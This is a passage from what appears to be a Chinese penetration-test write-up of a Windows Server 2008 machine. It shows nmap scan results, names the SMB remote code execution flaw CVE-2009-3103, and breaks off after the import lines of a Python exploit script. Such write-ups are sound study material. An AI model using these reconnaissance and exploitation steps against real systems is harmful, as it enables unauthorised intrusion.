PORT STATE SERVICE 53/tcp open domain 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown
PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.0.6001 (17714650) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ms-wbt-server Microsoft Terminal Service |_ssl-date: 2025-09-08T06:36:27+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: INTERNAL | NetBIOS_Domain_Name: INTERNAL | NetBIOS_Computer_Name: INTERNAL | DNS_Domain_Name: internal | DNS_Computer_Name: internal | Product_Version: 6.0.6001 |_ System_Time: 2025-09-08T06:36:18+00:00 | ssl-cert: Subject: commonName=internal | Not valid before: 2025-01-05T19:52:51 |_Not valid after: 2025-07-07T19:52:51 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
系统为 Windows 环境,开放有 wsdapi 和 Windows 的一些默认服务。
3.2 渗透测试突破边界
3.2.1 SMB 远程代码执行漏洞(CVE-2009-3103)
靶机除了开放了 Windows 的一些默认端口,还开放了 wsdapi 服务,该服务历史存在远程代码执行漏洞(MS09-063),但在搜索引擎未找到漏洞利用 EXP,先搁浅。
#!/usr/bin/python import tempfile import sys import subprocess from socket import socket from time import sleep from smb.SMBConnection import SMBConnection